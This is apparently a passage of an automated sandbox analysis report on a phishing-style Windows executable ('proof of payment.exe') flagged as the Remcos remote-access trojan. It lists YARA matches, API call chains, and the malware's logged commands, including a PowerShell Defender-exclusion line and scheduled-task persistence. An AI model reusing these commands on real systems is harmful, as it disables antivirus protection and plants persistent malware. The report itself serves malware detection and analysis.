                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_00449ED017_2_00449ED0
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_0041FE8317_2_0041FE83
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 17_2_00430F5417_2_00430F54
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_004050C220_2_004050C2
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_004014AB20_2_004014AB
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_0040513320_2_00405133
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_004051A420_2_004051A4
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_0040124620_2_00401246
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_0040CA4620_2_0040CA46
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_0040523520_2_00405235
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_004032C820_2_004032C8
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_0040168920_2_00401689
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00402F6020_2_00402F60
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: String function: 00434E10 appears 54 times
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: String function: 00434770 appears 41 times
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: String function: 00416760 appears 69 times
                    Source: proof of payment.exe, 00000000.00000002.1499485685.0000000002661000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs proof of payment.exe
                    Source: proof of payment.exe, 00000000.00000002.1509982038.0000000004F00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs proof of payment.exe
                    Source: proof of payment.exe, 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs proof of payment.exe
                    Source: proof of payment.exe, 00000000.00000002.1510709982.0000000006A30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs proof of payment.exe
                    Source: proof of payment.exe, 00000000.00000002.1497861125.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs proof of payment.exe
                    Source: proof of payment.exeBinary or memory string: OriginalFileName vs proof of payment.exe
                    Source: proof of payment.exe, 00000014.00000002.1689804255.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs proof of payment.exe
                    Source: proof of payment.exeBinary or memory string: OriginalFilenameBAEu.exe8 vs proof of payment.exe
                    Source: proof of payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: proof of payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: NvbYSEq.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.proof of payment.exe.5130000.6.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.proof of payment.exe.5130000.6.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, HZasU9nsywqiKFgaDv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, HZasU9nsywqiKFgaDv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, pr8Do41Q1tqFwxoK05.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@28/15@1/2
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,15_2_004182CE
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00417952
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,20_2_00410DE1
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,15_2_00418758
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040F474
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041B4A8
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AA4A
                    Source: C:\Users\user\Desktop\proof of payment.exeFile created: C:\Users\user\AppData\Roaming\NvbYSEq.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_03
                    Source: C:\Users\user\Desktop\proof of payment.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-F9KCYW
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeMutant created: \Sessions\1\BaseNamedObjects\CQjFNzs
                    Source: C:\Users\user\Desktop\proof of payment.exeFile created: C:\Users\user\AppData\Local\Temp\tmpCCF4.tmpJump to behavior
                    Source: proof of payment.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: proof of payment.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\proof of payment.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: proof of payment.exe, proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: proof of payment.exe, proof of payment.exe, 00000011.00000002.1688454390.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: proof of payment.exe, proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: proof of payment.exe, proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: proof of payment.exe, proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: proof of payment.exe, 0000000F.00000002.1697772966.0000000002897000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: proof of payment.exe, proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: proof of payment.exeVirustotal: Detection: 55%
                    Source: proof of payment.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\proof of payment.exeFile read: C:\Users\user\Desktop\proof of payment.exe:Zone.IdentifierJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe"
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\NvbYSEq.exe C:\Users\user\AppData\Roaming\NvbYSEq.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeProcess created: C:\Users\user\AppData\Roaming\NvbYSEq.exe "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\uevjjogtpiaq"
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
